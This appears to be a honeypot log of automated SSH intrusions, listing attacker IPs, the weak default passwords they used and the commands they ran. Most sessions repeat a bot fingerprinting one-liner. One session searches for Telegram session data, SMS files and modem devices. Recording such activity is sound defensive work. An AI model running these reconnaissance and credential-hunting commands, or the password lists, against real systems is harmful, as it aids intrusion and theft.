$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 tea_root_12 (206.189.125.160) — Slough, United Kingdom · 2 sessions · 8 cmds

2026-03-04 12:15 EST · as postgres/postgres, root/qwerty

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 windmill_root_8 (142.93.129.146) — Amsterdam, Netherlands · 5 sessions · 20 cmds

2026-03-04 12:06 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 stroopwafel_root_7 (188.166.28.22) — Amsterdam, Netherlands · 12 sessions · 48 cmds

2026-03-04 11:21 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 12x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×12

$ uname -s -v -n -m 2 > /dev/null ×12

$ uname -m 2 > /dev/null ×12

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×12

🎭 star_root_4 (107.170.69.246) — Secaucus, United States · 10 sessions · 40 cmds

2026-03-04 09:02 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 crumpet_sol_2 (138.68.149.66) — Slough, United Kingdom · 16 sessions · 16 cmds

2026-03-04 10:56 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 hanbok_root_9 (119.192.36.34) — Seoul, South Korea · 4 sessions · 16 cmds

2026-03-04 09:20 EST · as root/1234, root/admin, root/toor

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 liberty_root_18 (138.197.8.13) — Clifton, United States · 4 sessions · 16 cmds

2026-03-04 11:07 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 scone_root_16 (178.62.39.15) — Slough, United Kingdom · 7 sessions · 28 cmds

2026-03-04 11:00 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 chai_root_12 (157.245.105.40) — Bengaluru, India · 5 sessions · 20 cmds

2026-03-04 10:40 EST · as admin/admin, root/admin, root/admin123

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 chai_root_13 (139.59.37.34) — Bengaluru, India · 3 sessions · 12 cmds

2026-03-04 10:39 EST · as admin/password, root/12345678, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 crumpet_root_11 (46.101.90.220) — Slough, United Kingdom · 3 sessions · 12 cmds

2026-03-04 10:34 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 scone_root_2 (139.59.161.109) — Slough, United Kingdom · 15 sessions · 60 cmds

2026-03-04 09:00 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 15x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×15

$ uname -s -v -n -m 2 > /dev/null ×15

$ uname -m 2 > /dev/null ×15

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×15

🎭 eagle_root_20 (216.51.185.180) — Moulton, United States · 1 session · 9 cmds

2026-03-04 10:37 EST · as root/admin

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 eagle_root_4 (104.248.56.103) — North Bergen, United States · 14 sessions · 56 cmds

2026-03-04 09:07 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 14x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×14

$ uname -s -v -n -m 2 > /dev/null ×14

$ uname -m 2 > /dev/null ×14

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×14

🎭 stein_root_12 (104.248.21.68) — Frankfurt am Main, Germany · 8 sessions · 32 cmds

2026-03-04 08:22 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 yankee_root_18 (137.184.11.157) — Santa Clara, United States · 2 sessions · 8 cmds

2026-03-04 09:02 EST · as root/12345678, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 stroopwafel_root_8 (178.128.242.229) — Amsterdam, Netherlands · 1 session · 4 cmds

2026-03-04 08:46 EST · as root/1234

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 spice_root_11 (68.183.83.138) — Bengaluru, India · 4 sessions · 16 cmds

2026-03-04 08:39 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 strudel_root_14 (207.154.201.245) — Frankfurt am Main, Germany · 5 sessions · 20 cmds

2026-03-04 08:37 EST · as root/1234, root/12345678, root/admin

